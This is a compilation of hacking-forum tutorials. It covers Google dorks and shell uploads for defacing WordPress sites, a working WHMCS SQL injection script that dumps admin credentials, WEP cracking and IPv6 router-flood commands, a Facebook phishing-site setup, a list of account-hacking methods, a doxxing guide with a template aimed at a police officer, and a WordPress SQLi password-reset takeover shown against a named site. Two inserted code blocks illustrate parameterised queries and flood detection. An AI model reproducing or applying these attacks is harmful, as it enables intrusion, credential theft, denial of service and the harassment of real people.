WORDPRESS EXPLOIT

You can hack thousands of WordPress websites with this exploit,
and thousands of WordPress websites are vulnerable to this attack.

Google Dorks For This WordPress Exploit.
Google Dork 1) “inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php”
Google Dork 2) /wp-content/plugins/easy-comment-uploads/upload-form.php
Google Dork 3) Index of /wp-content/plugins/easy-comment-uploads


Step 1
Open Google.com and enter any one of the Google dorks given above.

Step 2
Now select any WordPress website and go to this URL:
VictimSite.com/wp-content/plugins/easy-comment-uploads/upload-form.php

You'll get an upload option here.
Now upload your shell to deface the website ...

Step 3
And now check it here:
VictimSite.com/wp-content/uploads/2012/10/yourfilehere

WHMCS 5.x.x SQL INJECTION

WHMCS 5.2.7 SQL Injection (2013.10.04)


Code:

#!/usr/bin/env python
# 2013/10/03 - WHMCS 5.2.7 SQL Injection
# http://localhost.re/p/whmcs-527-vulnerability

url = 'http://clients.target.com/' # wopsie dopsie
user_email = 'mysuper@hacker.account' # just create a dummie account at /register.php
user_pwd = 'hacker'

import urllib, re, sys
from urllib2 import Request, urlopen
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"

def exploit(sql):
    print "Doing stuff: %s" % sql
    r = urlopen(Request('%sclientarea.php?action=details' % url,
        data="token=%s&firstname=%s&lastname=1&companyname=1&email=%s&paymentmethod=none&billingcid=0&address1=1&address2=1&city=1&state=1&postcode=1&country=US&phonenumber=1&save=Save+Changes" % (user[1], 'AES_ENCRYPT(1,1), firstname=%s' % sql, user_email),
        headers={"User-agent": ua, "Cookie": user[0]})).read()
    return re.search(r'(id="firstname" value="(.*?)")', r).group(2)

def login():
    print "Getting CSRF token"
    r = urlopen(Request('%slogin.php' % url, headers={"User-agent": ua}))
    csrf = re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")',
                     r.read()).group(2)
    cookie = r.info()['set-cookie'].split(';')[0]
    print "Logging in"
    r = urlopen(Request('%sdologin.php' % url, data="username=%s&password=%s&token=%s" % (user_email,
                user_pwd, csrf), headers={"User-agent": ua, "Cookie": cookie})).read()
    if 'dologin.php' in r:
        sys.exit('Unable to login')
    else:
        return [cookie, re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")',
                                  r).group(2)]

user = login()
print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)') # get admins
print exploit('(SELECT * FROM (SELECT COUNT(id) FROM tblclients) as x)') # just get a count of clients

# oh you want to be evil
#exploit("'DISASTER', password=(SELECT * FROM (SELECT password FROM tblclients WHERE email='%s' LIMIT 1) as x)#" % user_email)

--------------------------------------------------------------------------------------------------------
References:

http://localhost.re/p/whmcs-527-vulnerability
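The payload in the script above only works if the application turns the submitted firstname value into SQL text. The following added example (not WHMCS code and not from the original post) models that bug class with a hypothetical update builder that passes values beginning with AES_ENCRYPT( through unquoted, beside a parameterised builder that stores the same payload as inert text. SQLite stands in for MySQL, with a stub AES_ENCRYPT registered so the statement parses; the schema and rows are constructed.

```python
import sqlite3

# Constructed sample data standing in for a client-profile table and the admin
# table the payload reads from (not real WHMCS data or schema).
SCHEMA = """
CREATE TABLE tblclients (id INTEGER PRIMARY KEY, firstname TEXT, lastname TEXT);
INSERT INTO tblclients VALUES (1, 'Alice', 'Smith');
CREATE TABLE tbladmins (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO tbladmins VALUES (1, 'admin', 'PLACEHOLDER_HASH');
"""

# The shape the script above submits as the firstname field: a value that is
# really a SQL fragment carrying a second assignment to the same column.
PAYLOAD = "AES_ENCRYPT(1,1), firstname=(SELECT GROUP_CONCAT(username) FROM tbladmins)"


def build_update_unsafe(table, fields, row_id):
    """Hypothetical query builder (assumed for illustration, not WHMCS source):
    it quotes ordinary values but passes anything beginning with AES_ENCRYPT(
    through as raw SQL so callers can write encrypted columns. That passthrough
    is exactly the opening the payload uses."""
    parts = []
    for col, val in fields.items():
        if val.startswith("AES_ENCRYPT("):
            parts.append("%s=%s" % (col, val))  # raw SQL, attacker-controlled
        else:
            parts.append("%s='%s'" % (col, val.replace("'", "''")))
    return "UPDATE %s SET %s WHERE id=%d" % (table, ", ".join(parts), row_id)


def build_update_safe(table, fields, row_id):
    """Every value is bound as a parameter; only column names, which come from
    application code rather than the request, are interpolated into SQL text."""
    assignments = ", ".join("%s=?" % col for col in fields)
    sql = "UPDATE %s SET %s WHERE id=?" % (table, assignments)
    return sql, list(fields.values()) + [row_id]


def run_profile_update(use_safe_builder):
    """Apply the payload through one builder and return what ends up stored."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    # SQLite has no AES_ENCRYPT; register a stub so the unsafe statement parses
    # the way it would on MySQL.
    conn.create_function("AES_ENCRYPT", 2, lambda value, key: "<ciphertext>")
    fields = {"firstname": PAYLOAD, "lastname": "1"}
    if use_safe_builder:
        sql, params = build_update_safe("tblclients", fields, 1)
        conn.execute(sql, params)
    else:
        # With duplicate SET targets the rightmost assignment wins, so the
        # subquery result, not the ciphertext, lands in firstname.
        conn.execute(build_update_unsafe("tblclients", fields, 1))
    return conn.execute("SELECT firstname FROM tblclients WHERE id=1").fetchone()[0]
```

With the unsafe builder the admin username is read back through the profile page; with the parameterised builder the payload is just a strange first name.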

WEP CRACKING TUTORIAL

WEP Cracking with Backtrack

First, you will need to have Backtrack 4 (LINK)
*** I find that if you are smart enough to be into hacking you will at least know how to burn an image file to a DVD, so after you do that, boot up the DVD and run BT4.

Login: root
Password: toor


Once logged in, type in: startx
BT4 is now set up; here's what follows.
==

WEP CRACK GUIDE


1. Open konsole and type the following to start up network connections.

/etc/init.d/networking start


2. Now we are going to put the network card into monitor mode by typing the following.

airmon-ng

(You will find your Interface here)

3. So first start up the scan

airmon-ng start wlan0 or 1

(depends on what it reads your card as, replace as needed)

4. Let's spoof your MAC address first by typing this next command.

ifconfig wlan1 down
macchanger -r wlan1
ifconfig wlan1 up


This will make it so we change our MAC address to the computer we are connecting to

5. Time to start finding our victim's router; type in konsole:

airodump-ng mon0

This will show the list and once you find one that suits your interest, Continue.

6. Once found press CTRL + C to copy the BSSID and then get out of airodump and then type into a new konsole

airodump-ng -c channel number, --bssid the BSSID of the router, -w what you want to save the cap file as, then mon0 (the interface we are using)

example: airodump-ng -c 1 --bssid 11:22:33:44:55:66 -w wepcap mon0


7. Let's start the passkey cracking. We need to get around 20,000-50,000 IVs. We start by sending fake authentication requests. To do this open a new konsole and type:

aireplay-ng -1 1 -a The BSSID of the router, then the interface.
example: aireplay-ng -1 1 -a 11:22:33:44:55:66 mon0


8. Almost done, we just need to continue the ARP cycle. Open another konsole and type:

aireplay-ng -3 -b The BSSID of the router, then the interface, and it will start replaying ARPs.


Collect a good amount of IVs, around 20k to 50k. Once it's there, press CTRL + C to stop the process and continue to step 9.

9. Time to start cracking that cap file :D Open a new konsole and type.

aircrack-ng -b (bssid) (file name)-01.cap
example: aircrack-ng -b 11:22:33:44:55:66 wepcap-01.cap


10. Now we should have the key to log in to the router, have fun enjoying your hacked wifi ;)

Here are some alternate methods of using Backtrack, taken from Hakunamatata69's tutorial, that are interesting and work too.


==
---ALTERNATE ATTACKS---
FRAGMENTATION
1. Konsole.
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -5 -b (bssid) -h 00:11:22:33:44:55 wlan0
4. packetforge-ng -0 -a (bssid) -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w arp-packet
5. airodump-ng -c (ch) --bssid (bssid) -w (file name) wlan0
6. aireplay-ng -2 -r arp-packet wlan0
7. aircrack-ng -b (bssid) (file name)-01.cap
==
CHOPCHOP
1. After step 11 in the WEP CRACK GUIDE, type the following:
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -4 -h 00:11:22:33:44:55 -b (bssid) wlan0
4. Repeat steps 4-7 in the FRAGMENTATION ATTACK
***Be sure to open new Konsoles when necessary***
--
NOTES
Key Commands.
wlan0 = Interface (Examples: wlan0, ath0, eth0)
ch = The channel the target is on (Examples: 6, 11)
bssid = MAC Address of target (Examples: 11:22:33:B1:44:C2)
ssid = Name of target (Examples: linksys, default)
filename = Name of .cap file (Examples: wep123, target, anythingyouwant)
fragment-*.xor= The * being replaced by a number
(Examples: fragment-25313-0123.xor)
PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)

Send Fake Email / Bomber / Custom Email Address TOOL DOWNLOAD


First, download the program [UPDATED VERSION!] here

VirusTotal

after downloading the program, run it and the program looks like this
[Image: screenshot_17.png]

now fill all text field on the application



[Image: screenshot_17.png]

after you fill up all the text fields, click the Send Email button and wait till you get a message box.

done. Your email was successfully sent to the target. Your email will land in the Inbox folder (tested on my GMail)

FIRST NAME ONLY FACEBOOK TUTORIAL

How to Have a first name only on Facebook Guide.

STEP 1
Open Firefox:
[Image: Cw7hQ1y.jpg]

STEP 2
Go to - Settings:
[Image: 864u65l.jpg]

Advanced and finally Network. Click on settings and click on Manual proxy configuration.

Next to Http: and Port: write any of the following:
Note: If one of them doesn't work try the next one.

After that tick the checkbox: Use this proxy server for all protocols. And finally click Okay:
[Image: sd7Xe86.jpg]

STEP 3
Go to: https://www.facebook.com/

Login with your Email/Password.
Note: Your account may be locked due to using
a proxy! This can be easily fixed by going through the identification
process.

Click on Menu located at the right top corner,
Select account settings:
[Image: xdgFKRQ.jpg]

Click edit your language,
Change it to: Bahasa Indonesian and finally click Save changes:
[Image: KuIVHO6.jpg]

Then edit your name,
Remove the last name and hit Simpan Perubahan to save changes:
[Image: 0m21QgX.jpg]

After that click on Bahasa to change the language
back to English and click on Simpan Perubahan:
[Image: Xdi46Md.jpg]
And finally click on top right menu and
hit: Logout to log you out safely:
[Image: i0FSumk.jpg]

After that head over to: Firefox - Options:
[Image: nQOJsQO.jpg]
Followed by: Advanced - Network
and finally Settings again, Remove the proxies and click on:
No Proxy to go out of proxy for faster surfing experience! and
click Okay:
[Image: a2YR43a.jpg]

I am not the owner of this tutorial so all credit goes to
whoever figured this out. I'm just re-presenting it for educational
purposes and in an easier way to follow.

Enjoy and hope you found this much easier to follow.
If you require any help then post below.

CRASH PC NETWORK TUTORIAL

EDUCATIONAL PURPOSES ONLY

Hello Hackforums, I would like to release this simple tutorial on how to crash a PC based network. This exploit will work on 90% of networks. If the Windows computers connected to the network are vulnerable they will consume 100% CPU usage and then become unresponsive. Now, how to check whether a network is vulnerable.

Press Windows Key + R on your keyboard and type "cmd" then press enter. Once inside command prompt type the following command.
Code:
ipconfig
Then look at your results. If your results include something along the lines of "IPv6 Address" the network is vulnerable. 90% of networks are currently vulnerable to this.

How to take out the network
1> Boot into Backtrack 5 R3 and connect to the network
2> Run this command
Code:
iwconfig
look at which adapter comes up with connections. It will most likely be eth0 or wlan0.
3> Prepare for attack. Type the following command and leave it running for however long you want the computers to remain unusable. Please do not use this for malicious purposes, this tutorial is to learn how to better protect yourself. The command to initiate the attack is
Code:
flood_router6 <network adapter you found earlier>
My code to launch an attack was
Code:
flood_router6 eth0

All Windows machines above XP including Vista, 7, 8 and SERVER can be attacked with this!

How to protect yourself!
A quick fix to protect yourself, disable IPv6 on your computer! Do this until a stable protocol has been established!

Thanks for reading, good luck to all in protecting yourself.
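The post's mitigation is to disable IPv6 on the host; a network defender can also detect the flood itself. flood_router6 works by spraying Router Advertisements that each announce a fresh random prefix (the tool's documented behaviour, not stated in the post), and hosts burn CPU processing them. The following added example (not from the post) parses ICMPv6 Router Advertisements and flags a source that announces more than a threshold of distinct prefixes within a short window; the packets, addresses and thresholds are constructed for illustration and no checksums are computed.

```python
import ipaddress
import struct
from collections import defaultdict

ICMPV6 = 58              # IPv6 next-header value for ICMPv6
ND_ROUTER_ADVERT = 134   # ICMPv6 type: Router Advertisement
OPT_PREFIX_INFO = 3      # ND option type: Prefix Information
ALL_NODES = ipaddress.IPv6Address("ff02::1").packed


def build_ra(src_addr, prefixes):
    """Constructed test packet (no checksum): IPv6 header + ICMPv6 RA carrying
    one Prefix Information option per entry in `prefixes` (CIDR strings)."""
    # type, code, checksum, cur hop limit, flags, router lifetime, reachable, retrans
    icmp = struct.pack("!BBHBBHII", ND_ROUTER_ADVERT, 0, 0, 64, 0, 1800, 0, 0)
    for cidr in prefixes:
        net = ipaddress.IPv6Network(cidr)
        # type, length (8-byte units), prefix length, L|A flags,
        # valid lifetime, preferred lifetime, reserved, then the 16-byte prefix
        icmp += struct.pack("!BBBBIII", OPT_PREFIX_INFO, 4, net.prefixlen, 0xC0,
                            2592000, 604800, 0) + net.network_address.packed
    ip6 = struct.pack("!IHBB", 0x60000000, len(icmp), ICMPV6, 255)
    return ip6 + ipaddress.IPv6Address(src_addr).packed + ALL_NODES + icmp


def parse_ra(pkt):
    """Return (source address, [(prefix_bytes, prefix_len), ...]) for an ICMPv6
    Router Advertisement, or None for anything else or a truncated packet."""
    if len(pkt) < 56 or pkt[0] >> 4 != 6 or pkt[6] != ICMPV6:
        return None
    payload_len = struct.unpack("!H", pkt[4:6])[0]
    icmp = pkt[40:40 + payload_len]
    if len(icmp) < 16 or icmp[0] != ND_ROUTER_ADVERT:
        return None
    src = ipaddress.IPv6Address(pkt[8:24])
    prefixes, off = [], 16
    while off + 2 <= len(icmp):
        opt_type, opt_len = icmp[off], icmp[off + 1]
        if opt_len == 0:          # malformed option; stop instead of spinning
            break
        end = off + opt_len * 8
        if opt_type == OPT_PREFIX_INFO and opt_len == 4 and end <= len(icmp):
            prefixes.append((icmp[off + 16:end], icmp[off + 2]))
        off = end
    return src, prefixes


class RAFloodDetector:
    """Flags a source that advertises more than `max_prefixes` distinct prefixes
    within `window` seconds. A real router repeats a handful of prefixes; a
    flood tool announces a new random prefix with nearly every packet."""

    def __init__(self, max_prefixes=10, window=5.0):
        self.max_prefixes = max_prefixes
        self.window = window
        self.events = defaultdict(list)   # src -> [(timestamp, prefix)]

    def observe(self, ts, pkt):
        """Feed one packet; return (source, distinct_count) when the threshold
        is exceeded, else None."""
        parsed = parse_ra(pkt)
        if parsed is None:
            return None
        src, prefixes = parsed
        recent = [(t, p) for t, p in self.events[src] if ts - t <= self.window]
        recent.extend((ts, p) for p in prefixes)
        self.events[src] = recent
        distinct = {p for _, p in recent}
        if len(distinct) > self.max_prefixes:
            return str(src), len(distinct)
        return None


def run_demo():
    """Constructed traffic: a legitimate router repeating one prefix, then a
    flooding host announcing a different /64 in every packet."""
    det = RAFloodDetector(max_prefixes=10, window=5.0)
    alerts = []
    for i in range(20):
        alerts.append(det.observe(i * 0.2, build_ra("fe80::1", ["2001:db8:1::/64"])))
    for i in range(30):
        pkt = build_ra("fe80::bad", ["2001:db8:%x::/64" % (0x100 + i)])
        alerts.append(det.observe(4.0 + i * 0.01, pkt))
    return [a for a in alerts if a is not None]
```

The legitimate router never trips the detector, while the flooding source is reported from its eleventh distinct prefix onward.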

COMPILATION OF PENETRATION TESTING TOOLS

Here is a compilation of multiple forensic and penetration testing tools for applications, networks, and websites.

[Image: sitelogo.png]
Nmap
Nmap is a very versatile tool developed to scan addresses (IPV6 included), this tool allows the users to gather a mass amount of information about the target quickly, information including open ports, + much, much more.
Nmap supports a large number of scanning techniques such as: UDP, TCP connect(), TCP SYN (half open), ftp proxy (bounce attack), ICMP (ping sweep), FIN, ACK sweep, Xmas Tree, SYN sweep, IP Protocol, and Null scan.

[Image: IXcgJ.png]

A very powerful network troubleshooting and analysis tool,
Wireshark provides the ability to view data from a live network, and supports hundreds of protocols and media formats.

[Image: logooxid.png]
Cain & Abel

Cain and Abel is a revolutionary tool that provides many functions that are able to do various password retrieval jobs, cracking passwords, sniffing networks, and routing/analyzing protocols. This tool is Windows-only, unlike many other tools that exist, this is a pleasant twist to modern penetration testing and forensic tools.

[Image: logo.png]

Metasploit, a very powerful network security and analysis tool, used often for penetration attacks, this tool has a clean interface and easily gathers the information that you seek.

[Image: HkR4k.png]

Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis. (Taken from their website)

[Image: FWR_Nessus1.jpg]

The Nessus tool provides high-speed data discovery, asset profiling, configuration auditing, and vulnerability analysis of networks.

[Image: 7diZx.png]

Havij is the most common and heard of testing tool for SQLI injection and many other web-based injection types. It fluently provides the site's scan, admin look-up, password cracking, and database retrieval. It literally makes it a breeze to hack, and find, vulnerable websites.

[Image: logo_small.png]

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT. (Taken from Kismet website)

[Image: CPoer.png]

BackTrack is a widely popular bootable Live-CD of a Linux distro. BackTrack offers a vast variety of penetration testing tools, along with those for network attacks, and supports many other forms of testing/attacking, for VOIP networks, websites + more. The tool's interface and design provides an easy to use layout.

[Image: YLv2g.png]

W3af is an extremely popular, powerful, and flexible framework for finding and exploiting web application vulnerabilities. It is easy to use and extend and features dozens of web assessment and exploitation-plugins. In some ways it is like a web-focused Metasploit. (Taken from nmap.org)

[Image: guidance-software-logo.png]
EnCase is a suite of computer forensics software, commonly used by law enforcement. Its wide use has made it a de-facto standard in forensics. It is made to collect data from a computer in a forensically sound manner (employing checksums to help detect tampering). (Taken from Nmap.org.)


[Image: JuEqY.png]

Helix is a live bootable Ubuntu CD, that contains a multitude of forensic tools involving cellphones, computers, file systems, images, and tied into its sheer power is a friendly and easy-to-use interface.

[Image: L4fYp.png]

Acunetix is a strong, and very popular website security tool. It provides many tools to test your website, (or others) for various injections. Acunetix WVS automatically checks your web applications for SQL Injection, XSS & other web vulnerabilities.

[Image: 6GXN9.png]

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. (Taken from http://portswigger.net/burp/)

HOW TO DOX SOMEONE

/###########################################\
|### || JP DoX tutorial || ###|
\###########################################/

====== The Power of a Dox: http://pastebin.com/qNbiTW4M =======

This tut is protected by copyright and
other international treaties.
LOL jk, feel free to post, but give some credz.

Perhaps in the wake of this undeclared cyber-war on various governments of the world,
you may have come across one or two dox's of political figures or CEO's. Most
commonly you can find these readily accessible on Pastebin, but have you wondered
how on earth people find this information?

Well it's easy, and perfectly legal.

You can find the answer (as well as source) to most problems by just a simple
search on the internet. Google, Yahoo, and bing work well in most instances, but
what about searching for people?

Whitepages? Can help.

But let's just say you're going for a little bit MORE detail, addresses, personal life
etc. Well there's a few tools to use, but most of the work will require a little more
intuition.

################################################################################

For this you will need:

#__ Google Chrome or Firefox, way faster and more secure than IE.
    I personally use Firefox.

#__ Paper always works better than typing everything, but if you feel
    like typing is easier, use wordpad or something, as you may need to
    paste/take note of certain details in your "investigation."

#__ Pastebin account to share with the world your results.

#__ An ethical target/reason.
    (Don't just do it for fun, because often times that leads to the most trouble.)

################################################################################

Recommended to have:

#__ A collaborative group with good communication.

It's always so much easier when you have two or more people working towards
one common goal. But good communication (ventrillo, irc, etc) is also KEY.

#__ Middle mouse button.

Just get it. On MFF you can open a new tab by clicking on a link with it.
(Most don't know that..)

#__ PATIENCE

(Some dox's I've done take about 30 minutes, but there's been times where
it has taken hours, even with a collaborative group.)

###################
### || TOOLS || ###
###################

The tools of the trade:

*-- http://www.pipl.com
Very powerful people search tool, eliminates a lot of the trash you will
find with Google and other search engines

*-- namechk.com
Another very powerful tool that you can use to see if usernames are taken
on a whole bunch of sites. If you see that the person you are doxing uses
an odd alias, running one or two searches on here might be very useful.

*-- spokeo.com
Premium will be helpful. <3



So my advice, try Facebook.

First time I ever dox'ed someone, I was able to snag their Facebook through a personal email
address I found through their employer, who often keep that information readily available.
When I looked through his info tab, I discovered that he was referring to the students at the
school as animals, and his job was to 'tame' them. That's always good stuff to keep written down
and screenshotted. ;)

Usually employers keep emails and other valuable information public. Office numbers, emails, addresses,
can usually be very helpful, along with education.

For example, let's say you were one of the unlucky few that got pepper sprayed at OWS, and you knew this
asshole was a Captain; he obviously has some sort of education in law enforcement.

If his Facebook has a hometown and age, you can pretty easily search alumni records and find out more
about where this dirtbag went to school. It's pretty simple, and usually all this requires is a
Google website search.

Search Example: Hipster Cop site:itt-tech.org

This will run a search query specific to itt.

Hipster cop reference, occupy humor lol. Anyway, if you actually set your mind to it, you can track down
anyone through just their social media. And if not, you can probably snag him talking to neighbors
on wall posts, which could sometimes lead to addresses.

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@ || Places to Check for INFORMATION || @@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

1). Facebook, Twitter, other Social Media using PIPL.com
2). Employers, past and present.
3). Educational websites
4). Whitepages, for addresses etc.
5). Namechk.com if you know any common usernames used by them.
6). If they own any websites, do a WHOIS.org lookup.
7). Xbox Gamertags can lead to IP's or friends.

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

Common DoX format.

Dox information may vary, but heres an easy format you can follow, areas will be filled in with
the information for Mr. Hairy Popo.

Name: Hairy Popo
Address: 333 OCISBAD Place.
Somerandomtown, OR 01337

Phone #: 938-323-2232
Office : 999-919-1337 < Always good

Personal Email: hipstercop@nypd.goldmansachs.com
Work email: Hairypopo@corporatemercenaries.org

FacebookLink: facebook.com/hipstercop
Twitter: @HipsterCop
Youtube: Bueer.


Education: PoliceBrutality University
Hurting innocent people BA '03

Fascist Bastards High School '98

Occupation: NYPD TARU Captain
Since 2003
Anyotherdirtyoufind.

Political
Party: Fascist

Children: 3 (Posting names/ages is unethical and will look bad on you..)


Military
Service: IF any, combat experience and units help.

** Will explain why later. **

Criminal
Record: If any.



Most police officers' arrests and citations are
public record but require a little digging; database
intrusions are easy, but not legal. You can always take
a look at emails; you find some good dirt there sometimes.

REMEMBER WHEN ACCESSING EMAILS, USE HIDEMYASS. kthnx.


So why is military service important? Well assuming you're using it for ethical reasons and
the person you are doxing has done something dishonorable, you might have one of his buddies
reading the dox. You never know.

TOP WAYS TO HACK FACEBOOK ACCOUNTS



Top 8 Ways To Hack Facebook Accounts 

There are various methods to hack a Facebook account password, like keyloggers, phishing websites etc., whereas bruteforcing, dictionary attacks, DDOS attacks etc. will not work directly due to the account lockout feature. Today in this post I am going to share a very effective way to hack Facebook accounts; I named it Top 10 ways to hack facebook accounts



8 Ways To Hack Facebook

1. Facebook Phishing 




Phishing is still the most popular attack vector used for hacking Facebook accounts. There are a variety of methods to carry out a phishing attack. In a simple phishing attack a hacker creates a fake login page which looks exactly like the real Facebook page and then asks the victim to log in to that page. Once the victim logs in through the fake page, the victim's "Email Address" and "Password" are stored in a text file. The hacker then downloads the text file and gets his hands on the victim's credentials.
I have explained the step by step phishing process in my post below:
                     

2. Keylogging 

Keylogging, according to me, is the easiest way to hack a Facebook password. Keylogging can sometimes be so dangerous that even a person with good knowledge of computers can fall for it. A keylogger is basically a small program which, once installed on the victim's computer, will record everything the victim types on his/her computer. The logs are then sent back to the attacker either by FTP or directly to the hacker's email address.

I have explained the step by step process in my post 

How To Hack Facebook With keylogging

3. Session Hijacking




Session hijacking can often be very dangerous if you are accessing Facebook over an http:// connection. In a session hijacking attack a hacker steals the victim's browser cookie, which is used to authenticate a user on a website, and uses it to access the victim's account. Session hijacking is widely used on LANs. I have already written a three part series on How session hijacking works? and also a separate post on Facebook session hijacking.


4. Sidejacking With Firesheep


Sidejacking attacks became common in late 2010; however they are still popular nowadays. Firesheep is widely used to carry out sidejacking attacks. Firesheep only works when the attacker and victim are on the same wifi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards wifi users.
To know more about sidejacking attack and firesheep, read the post mentioned below:



5. Mobile Phone Hacking
Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victim's mobile phone then he can probably gain access to his/her Facebook account. There are lots of mobile spying softwares used to monitor a cellphone.
The most popular Mobile Phone Spying softwares are:
1. Mobile Spy 

6. DNS Spoofing 

If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original facebook.com page to his own fake page and hence can get access to victims facebook account.

7. USB Hacking 

Usb password stealer
If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the browser, I have also posted related to this attack which you can read by accessing the link below:

8. Man In the Middle Attacks

If the victim and attacker are on the same LAN and on a switch based network, a hacker can place himself between the client and the server, or he could also act as a default gateway and hence capture all the traffic in between. ARP poisoning, which is the other name for man in the middle attacks, is a very broad topic and is beyond the scope of this article. We have written a couple of articles on man in the middle attacks which can be accessed from the links mentioned below:
If you are really interested in learning how man in the middle attacks work, you can view the presentation


I have worked very hard on this post please leave comments if u like it


HACK FACEBOOK USING PHISHING TECHNIQUE

MAKING FACEBOOK PHISHING SITE TUTORIAL.

Phishing is the act of attempting to acquire information such as usernames and passwords. phishing directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users,and exploits the poor usability of current web security technologies. 


Tutorial:
            Hi friends, I'm again in front of you with an easy & complete phishing tutorial. Many times phishing tricks were posted here but almost every user says they can't understand, so now you can make your phishing page easily step by step. This has a great advantage: it's the latest FB phishing page made by me. Reply here if you face any problem. Download This Phishing Script
                                               Download

then go to 000webhost.com
 and choose the free account option
now click on free domain

              In registration choose a password with a combination of capital and small letters & numbers.
              After registration verify your account by email.

Now you can see your control panel (refresh the page if required); go to the control panel

you can see a page to upload your file (don't upload the file here; it must be uploaded to the public directory as in the image below)

Upload your facebook page in .zip format

now you can see your file below like this

Thats all... 
 Now Your Phishing fb page is  YourDomain.com/index.html 
index.html is your phishing page.

 Now you can send this page to your victims. When a victim logs in to this fake page, their login and password are stored in your hosting directory in lol.txt like below





Note: This default FB phishing page redirects to www.google.com;
 you can change this by editing hello.php in the downloaded fb phishing.zip pack

..This tutorial is only for educational purposes, to protect you from hackers; applying this technique may be considered a crime..

HACKING WP without CRACKING HASH

ok so .. as the title says .. im going to show u .. how to hack a wordpress site .. without cracking the hashes ..

now .. this works with all the wordpress sqli exploits ever posted in any of its themes or plugins ..

Point to remember:

you cannot exploit the latest version of wordpress with this .. 3.4.2 .. which was released on 6th - september 2012 .. yea .. u heard it right .. released this month ..

now there are still tons of websites out there which haven't been updated yet ..

all the previous version can be exploited using this method ..


So .. lets start ..


Things u need

1) any wordpress sqli dork .. (u can get it from exploit-db.com)
2) knowledge of sqli .. (coz this thread is not about sqli)
3) my help .. hehe


1) My Dork

There are number of sqli exploits in different plugins and themes of wordpress. The exploit im picking is in one of the plugins called Wp-FacebookConnect..
and the google dork for it is ..


Code:
inurl:"/?fbconnect_action=myhome"

now paste this code in google.com (one of my best frnds)
and u will see no. of vulnerable websites ..

2) now the website im going to use here is ..

Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&userid=2


[Image: 1.PNG]


here the parameter userid is vulnerable to sqli ..

so lets see what we can get from the data base ..

im going to change the above URL with this

Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email),7,8,9,10,11,12+from+wp_users--

now u can see we got the username with the email id ..
[Image: 2.PNG]

now if i change the above URL to this ..

Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9,10,11,12+from+wp_users--

im going to get the user name and the hashed password ..
[Image: 3.PNG]

(point to be noted here .. im using concat here .. u can also use group_concat to get all the users..
again .. that would be ur knowledge how u use sqli)

now .. we all know that wordpress hashes belong to the category MD5(wordpress).. (different from simple MD5)
and are very hard to crack ..

but if ur mad .. u should think out of the box ..

so now follow the steps ..

a) go to the login page of of wordpress site .. in my case that would be ..

Code:
http://masaru.ikeda.me/wp-login.php

b) click on Lost your password ?
[Image: 4.PNG]

c) now the wordpress will ask me for the username or email .. for which i want to reset the password .. in my case that is 'masaru' .. so go ahead and enter the username ..
[Image: 5.PNG]

d) now look closely .. it says .. "Check your e-mail for the confirmation link."
[Image: 6.PNG]

e) now what wordpress does actually .. it sends an activation key to the email address of that user .. and it sets the value of activation key in the database aswell .. what u have to do is just to get that key ..

f) so now im going to change my URL to this .. to get the activation key ..

Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12+from+wp_users--

and u can see .. we got the activation key here .. u should note it down somewhere ..
[Image: 7.PNG]

g) Now .. finally all we have to do is .. without going to the email address .. reset the password .. for that im going to add this to my URL ..

Code:
wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE

and im going to replace the KEYHERE with the activation key i got .. and the USERNAME HERE with the username .. which in my case is 'masaru' .. so my URL will be ..

Code:
http://masaru.ikeda.me/wp-login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=masaru

and VOILA .. the wordpress will ask u for ur new password ..
[Image: 8.PNG]


now go the login page again .. and try the new password .. and there u go .. u got access to the panel ..
[Image: 9.PNG]
now u know how to shell the wordpress site .. don't u ??

Trick for those .. who are actually MAD:

1) Now to chk quickly if a website is using the latest version 3.4.2 or previous versions .. goto the login page and see .. if there is an option there to go back to the main page of the blog.. like in my case see the option .. <- Back to Digital Way of Living then this is not 3.4.2 ... if u don't see this option .. then it is 3.4.2 .. this trick is not legit .. i figured it out .. and is working for me ..

